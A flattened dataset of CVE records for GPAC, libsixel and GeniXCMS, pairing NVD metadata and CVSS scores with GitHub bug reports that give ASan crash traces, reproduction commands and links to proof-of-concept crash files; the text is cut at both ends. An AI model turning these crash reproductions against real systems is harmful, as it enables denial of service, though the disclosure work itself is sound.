--- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d asan ``` [iso file] Box "stco" (start 817) has 142 extra bytes [iso file] Track with no sample description box ! ================================================================= ==11412==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000eea0 at pc 0x000000aee083 bp 0x7fffffff7f70 sp 0x7fffffff7f60 READ of size 4 at 0x60600000eea0 thread T0 #0 0xaee082 in trak_Read isomedia/box_code_base.c:7153 #1 0x6c4ade in gf_isom_box_read isomedia/box_funcs.c:1529 #2 0x6c4ade in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #3 0x6c552c in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #4 0xadf844 in moov_Read isomedia/box_code_base.c:3745 #5 0x6c5e84 in gf_isom_box_read isomedia/box_funcs.c:1529 #6 0x6c5e84 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #7 0x6c66e4 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #8 0x6dc060 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #9 0x6decb3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #10 0x6decb3 in gf_isom_open_file isomedia/isom_intern.c:615 #11 0x42f93d in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_1de1f8d-0.9/applications/mp4box/main.c:4789 #12 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #13 0x41e278 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan_1de1f8d-0.9/bin/MP4Box+0x41e278) 0x60600000eea0 is located 0 bytes inside of 56-byte region [0x60600000eea0,0x60600000eed8) freed by thread T0 here: #0 0x7ffff6f022ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x6c46af in gf_isom_box_del isomedia/box_funcs.c:1509 previously allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xae636d in stco_New isomedia/box_code_base.c:5616 SUMMARY: AddressSanitizer: heap-use-after-free isomedia/box_code_base.c:7153 trak_Read Shadow bytes around the buggy address: 0x0c0c7fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9da0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c7fff9db0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9dc0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 04 =>0x0c0c7fff9dd0: fa fa fa fa[fd]fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff9de0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9df0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==11412==ABORTING ``` --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: heap-use-after-free in trak_Read isomedia/box_code_base.c:7153
https://api.github.com/repos/gpac/gpac/issues/1329/comments
2
2019-11-09T11:15:44Z
2020-01-08T12:44:04Z
https://github.com/gpac/gpac/issues/1329
520,393,655
1,329
964
CVE-2019-20170
2019-12-31T00:15:13.213
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is an invalid pointer dereference in the function GF_IPMPX_AUTH_Delete() in odf/ipmpx_code.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1328" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1328" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "763" ]
763
https://github.com/gpac/gpac/issues/1328
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-GF_IPMPX_AUTH_Delete ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-GF_IPMPX_AUTH_Delete gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x000000000056907e in gf_ipmpx_data_del () (gdb) bt #0 0x000000000056907e in gf_ipmpx_data_del () #1 0x000000000056aa7c in gf_ipmpx_data_parse () #2 0x000000000056274a in gf_odf_read_ipmp () #3 0x000000000055a076 in gf_odf_parse_descriptor () #4 0x000000000056503b in gf_odf_desc_read () #5 0x00000000006ca7b4 in esds_Read () #6 0x00000000005137e1 in gf_isom_box_parse_ex.constprop () #7 0x0000000000513e15 in gf_isom_parse_root_box () #8 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #9 0x000000000051c48c in gf_isom_open_file () #10 0x000000000041c082 in mp4boxMain () #11 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #12 0x000000000040eba9 in _start () ``` ASAN info: ```C ASAN:SIGSEGV ================================================================= ==27770==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000000a (pc 0x0000007bacbf bp 0x00000000000a sp 0x7fffffff8020 T0) #0 0x7bacbe in GF_IPMPX_AUTH_Delete odf/ipmpx_code.c:115 #1 0x7bacbe in delete_algo_list odf/ipmpx_code.c:363 #2 0x7bacbe in DelGF_IPMPX_MutualAuthentication odf/ipmpx_code.c:371 #3 0x7bacbe in gf_ipmpx_data_del odf/ipmpx_code.c:1853 #4 0x7bec88 in gf_ipmpx_data_parse odf/ipmpx_code.c:295 #5 0x7a9969 in gf_odf_read_ipmp odf/odf_code.c:2426 #6 0x795ce3 in gf_odf_parse_descriptor odf/descriptors.c:159 #7 0x7afc16 in gf_odf_desc_read odf/odf_codec.c:302 #8 0xad3fb3 in esds_Read isomedia/box_code_base.c:1256 #9 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #10 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #11 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #12 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #13 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #14 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #15 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #16 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #17 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV odf/ipmpx_code.c:115 GF_IPMPX_AUTH_Delete ==27770==ABORTING ``` Edit --- This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: heap-use-after-free in GF_IPMPX_AUTH_Delete odf/ipmpx_code.c:115
https://api.github.com/repos/gpac/gpac/issues/1328/comments
2
2019-11-09T11:14:15Z
2020-01-08T12:43:51Z
https://github.com/gpac/gpac/issues/1328
520,393,299
1,328
965
CVE-2019-20171
2019-12-31T00:15:13.307
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There are memory leaks in metx_New in isomedia/box_code_base.c and abst_Read in isomedia/box_code_adobe.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1337" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1337" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/1337
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-memory-leak ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-memory-leak gdb info: ```C Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". [iso file] Box "metx" size 15 (start 89) invalid (read 25) [iso file] Box "abst" size 24 (start 0) invalid (read 104) [iso file] Incomplete box abst - start 0 size 24 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Box "metx" size 15 (start 89) invalid (read 25) [iso file] Box "abst" size 24 (start 0) invalid (read 104) Truncated file - missing 24 bytes [Inferior 1 (process 6276) exited with code 01] ``` ASAN info: ```C ==26041==ERROR: LeakSanitizer: detected memory leaks Direct leak of 224 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xaefada in metx_New isomedia/box_code_base.c:8367 Direct leak of 8 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x792106 in abst_Read isomedia/box_code_adobe.c:95 #2 0xb62c63 (/bin/MP4Box+0xb62c63) Indirect leak of 32 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x46c27d in gf_list_new utils/list.c:602 Indirect leak of 16 byte(s) in 4 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7ffff63eb489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489) ``` SUMMARY: AddressSanitizer: 280 byte(s) leaked in 10 allocation(s). --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: 2 memory leaks of metx_New(), abst_Read()
https://api.github.com/repos/gpac/gpac/issues/1337/comments
3
2019-11-09T12:00:28Z
2020-01-08T13:26:12Z
https://github.com/gpac/gpac/issues/1337
520,403,921
1,337
966
CVE-2018-14476
2019-12-31T16:15:11.103
GeniXCMS 1.1.5 has XSS via the dbuser or dbhost parameter during step 1 of installation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/151006/GeniXCMS-1.1.5-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/semplon/GeniXCMS/issues/88" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/151006/GeniXCMS-1.1.5-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/semplon/GeniXCMS/issues/88" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metalgenix:genixcms:1.1.5:*:*:*:*:*:*:*", "matchCriteriaId": "09684074-6DDD-46CF-873A-A2066E443085", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/semplon/GeniXCMS/issues/88
[ "Third Party Advisory" ]
github.com
[ "semplon", "GeniXCMS" ]
Hello, While testing the Netsparker web application security scanner we identified a vulnerability in GeniXCMS 1.1.5. Can you please advise whom shall we contact to disclose the vulnerability details so it can be fixed? Please email me: daniel at netsparker dot com Looking forward to hearing from you. Regards, Daniel Bishtawi Marketing Administrator | Netsparker Web Application Security Scanner
Advisory from Netsparker - GeniXCMS 1.1.5 vulnerability
https://api.github.com/repos/GeniXCMS/GeniXCMS/issues/88/comments
3
2017-11-23T11:19:21Z
2019-12-15T05:00:02Z
https://github.com/GeniXCMS/GeniXCMS/issues/88
276,339,738
88
967
CVE-2019-20205
2020-01-02T14:16:36.253
libsixel 1.8.4 has an integer overflow in sixel_frame_resize in frame.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/127" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/127" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.4:*:*:*:*:*:*:*", "matchCriteriaId": "EB0720EA-8C4F-44BB-91C1-3098DA288118", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/saitoha/libsixel/issues/127
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
In function `sixel_frame_resize`, `width` and `height` can be specified by user. Line 503 has an integer overflow. If `width` and `height` are very large numbers, allocation will fail. ![Screen Shot 2019-12-31 at 3 52 58 PM](https://user-images.githubusercontent.com/20929895/71614439-96c22600-2be6-11ea-94d1-ca0942575d55.png) poc: [poc.zip](https://github.com/saitoha/libsixel/files/4012173/poc.zip) result: ``` ./img2sixel -w 1000000 -h 100000 ./0.png ================================================================= ==85426==ERROR: AddressSanitizer: requested allocation size 0xffffffffd964b800 (0xffffffffd964c800 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0) #0 0x493c3d in malloc /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:145:3 #1 0x4c6a67 in rpl_malloc /home/casper/targets/struct/libsixel/source/BUILD/converters/malloc_stub.c:45:20 #2 0x4d6ba6 in sixel_allocator_malloc /home/casper/targets/struct/libsixel/source/BUILD/src/allocator.c:155:12 #3 0x4f2f9f in sixel_frame_resize /home/casper/targets/struct/libsixel/source/BUILD/src/frame.c:504:37 #4 0x4d29a2 in sixel_encoder_do_resize /home/casper/targets/struct/libsixel/source/BUILD/src/encoder.c:637:18 #5 0x4d1141 in sixel_encoder_encode_frame /home/casper/targets/struct/libsixel/source/BUILD/src/encoder.c:962:18 #6 0x4d0b73 in load_image_callback /home/casper/targets/struct/libsixel/source/BUILD/src/encoder.c:1673:12 #7 0x4ff4a8 in load_with_builtin /home/casper/targets/struct/libsixel/source/BUILD/src/loader.c:943:14 #8 0x4fddc2 in sixel_helper_load_image_file /home/casper/targets/struct/libsixel/source/BUILD/src/loader.c:1392:18 #9 0x4d0857 in sixel_encoder_encode /home/casper/targets/struct/libsixel/source/BUILD/src/encoder.c:1737:14 #10 0x4c66c8 in main /home/casper/targets/struct/libsixel/source/BUILD/converters/img2sixel.c:457:22 #11 0x7f186b53eb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 ==85426==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: allocation-size-too-big /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:145:3 in malloc ==85426==ABORTING ```
integer overflow in sixel_frame_resize in frame.c
https://api.github.com/repos/saitoha/libsixel/issues/127/comments
2
2019-12-31T08:03:38Z
2020-01-03T01:32:26Z
https://github.com/saitoha/libsixel/issues/127
544,120,874
127
968
CVE-2019-20208
2020-01-02T14:16:36.363
dimC_Read in isomedia/box_code_3gpp.c in GPAC 0.8.0 has a stack-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1348" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1348" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1348
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! [ √] I looked for a similar issue and couldn't find any. [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A crafted input will lead to crash in box_code_3gpp.c at gpac 0.8.0. Triggered by ./MP4Box -diso POC -out /dev/null Poc [011-stack-dimC_Read1000](https://github.com/gutiniao/afltest/blob/master/011-stack-dimC_Read1000) The ASAN information is as follows: ``` ./MP4Box -diso 011-stack-dimC_Read1000 -out /dev/null ================================================================= ==3045==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff6e0d88d0 at pc 0x564b9b2d69fb bp 0x7fff6e0d8480 sp 0x7fff6e0d8470 WRITE of size 1 at 0x7fff6e0d88d0 thread T0 #0 0x564b9b2d69fa in dimC_Read isomedia/box_code_3gpp.c:1000 #1 0x564b9ae5bb35 in gf_isom_box_read isomedia/box_funcs.c:1528 #2 0x564b9ae5bb35 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #3 0x564b9ae5c1e4 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #4 0x564b9ae72f44 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #5 0x564b9ae75bca in gf_isom_open_file isomedia/isom_intern.c:615 #6 0x564b9abbe852 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4767 #7 0x7f4b5d817b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x564b9abafb19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19) Address 0x7fff6e0d88d0 is located in stack of thread T0 at offset 1056 in frame #0 0x564b9b2d641f in dimC_Read isomedia/box_code_3gpp.c:983 This frame has 1 object(s): [32, 1056) 'str' <== Memory access at offset 1056 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow isomedia/box_code_3gpp.c:1000 in dimC_Read Shadow bytes around the buggy address: 0x10006dc130c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 